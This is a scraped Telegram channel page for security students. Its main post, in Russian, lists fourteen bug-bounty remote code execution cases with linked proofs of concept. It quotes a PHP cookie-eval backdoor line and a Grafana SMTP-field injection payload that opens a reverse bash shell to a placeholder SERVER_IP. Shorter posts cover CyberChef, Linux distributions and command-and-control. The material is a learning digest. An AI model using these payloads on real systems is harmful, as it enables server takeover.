SecList for CyberStudents
241 subscribers
615 photos
26 videos
211 files
929 links
Think outside the box
Download Telegram
Remote Code Execution | Command Injection


RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.

1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.

2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.

3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}

4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.

5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./

6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.

7. RCE через SQL инъекцию. PoC.

8. Dependency Confusion. Об этом типе атак я делал пост ранее.

9. 0day уязвимости: Secure VPN.

10. RCE через картинки: ExifTool.

11. RCE через инъекцию опций в git.

12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"

13. Классический RCE через SSRF через Gopher. Статья.

14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.


#rce
osnovy_veb-xakinga_bolee_30_primerov_u_Wjqaoge.pdf
6.1 MB
Основы веб-хакинга. Более 30 примеров уязвимостей
СyberChefприложение для шифрования, кодирования, сжатия и анализа данных

Этот инструмент позволяет как техническим, так и нетехническим аналитикам манипулировать данными, не используя сложные инструменты или алгоритмы

Ссылка на проект

GitHub | #Interesting #Security #Useful
Media is too big
VIEW IN TELEGRAM
The Best Guide to Entry Level Cyber Security Jobs - The Roadmap to InfoSec
Media is too big
VIEW IN TELEGRAM
Выбор дистрибутива Linux для дома

В этом ролике автор подробно разбирает, что выбрать из дистрибутивов, какой рабочий стол Linux подойдет лучше всего и где и как применять различные дистрибутивы GNU/Linux для решения тех или иных задач.

00:00 Вступление
04:38 Fedora
09:26 Debian
13:12 Mint LMDE
15:45 Arch
18:19 Итоги

Смотреть это видео на youtube: youtu.be/fRBXtQDhDh4
Forwarded from Cyber Pub
C2 - Command and Control

Hacker lar dastlabki hujumdan keyin buzilgan qurilmalar bilan ma'lumotlarni almashish (boshqarish) uchun ishlatiladi usullar to'plamiga aytiladi.
C2 hujumga uchragan tashkilotdagi qurilmalar va Hacker tomonidan boshqariladigan server o'rtasidagi bir yoki bir nechta yashirin aloqa kanallarini taminlashni o'z ichiga oladi. Ushbu aloqa kanallari buzilgan qurilmalarga ko'rsatmalarni uzatish, qo'shimcha zararli dasturlarni yuklash va ma'lumotlarni o'g'irlash uchun hackerning serveriga yuboradi.

➡️ C2 Matrix

#c2 | 😈 Cyber Pub
Please open Telegram to view this post
VIEW IN TELEGRAM